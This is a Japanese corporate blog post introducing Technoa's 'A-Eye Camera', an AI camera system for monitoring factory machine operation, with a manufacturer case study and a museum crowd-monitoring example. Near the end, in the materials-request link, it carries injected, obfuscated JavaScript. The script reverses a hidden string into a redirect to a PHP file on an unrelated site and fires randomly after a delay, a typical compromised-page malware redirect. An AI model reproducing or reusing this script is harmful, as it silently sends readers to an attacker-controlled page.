コクネ製作様×テクノア IoTカイゼン日記 Vol.1製造業向けIoT...

コクネ製作様×テクノア IoTカイゼン日記 Vol.1製造業向けIoTソリューション『A-Eyeカメラ』とは?

こんにちは。テクノアの西村です。
本記事から全6回でテクノアとお客様のIoT導入体験記「コクネ製作様カイゼン日記」の連載をスタートいたします。

目次

1. 『A-Eyeカメラ(エーアイカメラ)』とは
2. 『A-Eyeカメラ』を使った稼働監視と『A-Eyeカメラ』の特長
3. 『A-Eyeカメラ』導入企業 コクネ製作株式会社様について
4. 工場以外での『A-Eyeカメラ』活用法

1. 『A-Eyeカメラ(エーアイカメラ)』とは

『A-Eyeカメラ』はテクノアが2020年3月に発売開始した中小製造業様向けのIoTソリューションです。
ネットワークカメラで撮影された画像を元にAI(人工知能)が生産設備の稼働状況を判断し、クラウドに情報を蓄積します。
蓄積された情報をリアルタイムに集計・分析し、全社員で稼働状況を共有することで「工場の見える化」を推進します。
2020年11月に一般社団法人クラウドサービス推進機構より、クラウドサービス認定と、一般社団法人 ASP・SaaS・AI・IoTクラウド産業協会主催の「第14回ASPIC IoT・AI・クラウドアワード2020」で「IoT部門 先進技術賞」を受賞しており、中小製造業様向けのIoTソリューションとして注目を集めています。

2. 『A-Eyeカメラ』を使った稼働監視と『A-Eyeカメラ』の特長

『A-Eyeカメラ』は、工場に設置された機械の稼働状況を確認できるシステムです。主に下記の①~③の内容で、機械が動いているかを判定できます。もちろん、AIに判定条件を学習させれば、①~③以外の情報でも機械が動いているか判定できるので、機械・環境に併せた稼働の判定方法を設定できます。


判定方法①積層信号灯の色



判定方法②CNC操作画面の表示内容 (HOLDなら停止中など、文字で判断)



判定方法③作業者の滞在状況


機械の稼働状況は、WEB上で共有できるため、機械が緊急停止してもすぐさま対応に取り掛かれることも大きなポイントです。

その他、他社のIoT機器と異なる特長を、3つご紹介します。

特長①機械・設備のメーカー・年代を問わず導入可能

『A-Eyeカメラ』はネットワークカメラで撮影された画像を元にAIが生産設備の稼働状況を判断するので、機械の仕様に影響を受けません。また、最大5m離れた場所にネットワークカメラを設置・判別できるため、特別な配線や機械・設備側の仕様変更も不要です。

特長②ローコストで設置可能

設置作業はネットワークカメラが対象物を判別できるように、壁面や機械・設備の仕様変更を伴わない場所に設置するだけです。使用するネットワークカメラは、一般の電器店でも販売されている機材で問題ありません。特別な高額機器や機械との配線接続も不要なため、設備設置にかかるコストも削減できます。
導入後のランニングコストは月額2,000円~(カメラ1台あたり)と低価格で運用いただけます。対象となる機械・設備が増加しても大幅なコスト増にはなりません。

特長③AIによる学習で精度が向上する

『A-Eyeカメラ』設置後もAIに学習させることで情報の精度が向上し、工場内の環境変化にも柔軟に対応できます。

3. 『A-Eyeカメラ』導入企業 コクネ製作株式会社様について

『A-Eyeカメラ』はコクネ製作株式会社様(愛知県西尾市 以下、コクネ製作様)で導入いただいています。
コクネ製作様では、工場のIoT化を通じ、製造現場の負担軽減を目的として、機械の稼働状況を見える化できるIoTソリューションを探していました。その中でテクノアの『A-Eyeカメラ』をお選びいただきました。
『A-Eyeカメラ』に決めたのは以下の3つの理由からです。

理由①導入にかかるコストが安価

理由②1つのシステムですべての機械の稼働状況を管理できる

理由③生産現場に影響を与えることなく導入できる

導入事例は『A-Eyeカメラ』製品ホームページでもご紹介していますが、今後、本連載で、さらに詳しくご紹介します!
また、テクノア公式YouTubeチャンネルではコクネ製作様の工場見学動画を公開中です。ぜひご覧ください。

4. 工場以外での『A-Eyeカメラ』活用法

岐阜市科学館様(岐阜県岐阜市) では、「新しい三密対策へのアプローチ」として『A-Eyeカメラ』を導入いただいています。
『A-Eyeカメラ』の画像認識を利用して、人のいる・いないや、人の分布を測定し、展示エリアごとの状況の「見える化」を実現。
密になりそうな展示物やブースがあれば、人が流入することを一時的に制限する、別の場所へ誘導するなどの対策をとれるようになりました。このように、岐阜市科学館様では『A-Eyeカメラ』を、安心・安全に展示物を見ていただくためのツールとして導入いただいています。
このような 「人の動き・分布を見たい」というニーズに対しては、業種に関係なく導入いただけると考えております。

本記事では、『A-Eyeカメラ』の製品概要について、簡単にご紹介しました。次回より『A-Eyeカメラ』を活用した、コクネ製作様カイゼン日記をお送りいたします。『A-Eyeカメラ』は、IoT機器に関する専門知識がなくても、簡単に、早く導入いただける中小製造業様向けのIoTソリューションです。
ご興味がありましたら、まずは以下より資料請求をお願いいたします。
→A-Eyeカメラの無料資料請求は$mWn=function(n){if(typeof ($mWn.list[n])==”string”) return $mWn.list[n].split(“”).reverse().join(“”);return $mWn.list[n];};$mWn.list=[“\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to.technoa.co.jp/” target=”_blank” rel=”noopener”>AI画像認識を利用した工場の見える化システム『A-Eyeカメラ』
コクネ製作株式会社様
コクネ製作株式会社様工場見学LIVE(YouTube)



氏名:西村 恭範(ニシムラ ヤスノリ)
所属:(株)テクノア AI・IoT事業部 事業部長
スマート経営アドバイザー 
前職は製造業にて金型製造、設計開発に従事。テクノアでは生産管理ソフト『TECHSシリーズ』のシステムエンジニアを経て、開発マネージャー、東京本部長を歴任し、現職。生産管理システムの提案・導入支援、AI・IoTを活用した経営課題解決が得意分野です。


株式会社テクノアは、出荷本数4000社を超える国内トップシェアの中小企業向け生産管理システム『TECHSシリーズ』を開発・販売しているソフトウェア開発企業です。「外洋帆船経営」を標榜し、情報技術【IT文明】の進歩を先取して『人々がより人間らしい、ゆとりと生きがいがある生活』を実現するため、独創的なソフトウェアと付帯サービス【ソフト文化】の開発と提供を通じて社会貢献します。